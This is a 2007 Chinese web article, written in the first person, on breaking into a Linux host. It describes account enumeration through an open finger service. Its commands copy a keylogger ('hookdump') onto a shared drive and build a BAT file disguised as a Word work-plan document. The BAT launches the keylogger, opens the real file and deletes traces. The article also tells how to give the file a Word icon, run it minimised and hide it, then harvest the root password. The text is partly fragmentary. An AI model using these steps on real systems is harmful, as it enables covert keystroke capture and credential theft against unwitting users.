知己知彼 看黑客如何入侵Linux操作系统
作者: , 出处:天极网, 责任编辑: 徐蕊,
2007-12-17 10:42
我发现了一个网站,于是常规入侵。很好,它的FINGER开着,于是我编了一个SHELL,aaa帐号试到zzz(by the way,这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比, 如果一个帐号只有两三位长,那它的口令一般也很简单,反之亦然,故且称之为若氏定理吧),结果一个帐号也不存在,我没有再试它的帐号。
| 以下是引用片段: >copy hookdump.* i: |
然后再在自己的机器上编一个同名的BAT文件:X月工作计划.BAT
| 以下是引用片段: >edit c:X月工作计划.BAT @echo off hookdump attrib -h X月工作计划.doc C:Program FilesMicrosoftOfficeWinword X月工作计划.doc attrib -h temp.bat del temp.pif del temp.bat |
这时你的C驱根目录就有了这么一个BAT文件,它是一个方形的图标,和那个WORD文件大相径庭,root怎么会运行它呢?没关系,在这个文件上点右键,点属性,在“程序”栏选“更改图标”不就行了吗?WORD的图标在你机器C:Program FilesMicrosoftOffice中。还要将“运行”改为“最小化”,“退出时关闭”打上勾,这样才能保证在运行时一点迹象也没有。事实上这个BAT文件变成了两个,还有一个PIF文件就是它的图标。
把这两个文件传上去:
| 以下是引用片段: >copy X月工作计划.bat i: >copy X月工作计划.pif i: |
| 以下是引用片段: >attrib +h X月工作计划.doc >attrib +h X月工作计划.bat |
几天后,我进入这个工作站,取下记录下来的击键记录,找出root的口令,进入主机。
- 本文关键词:

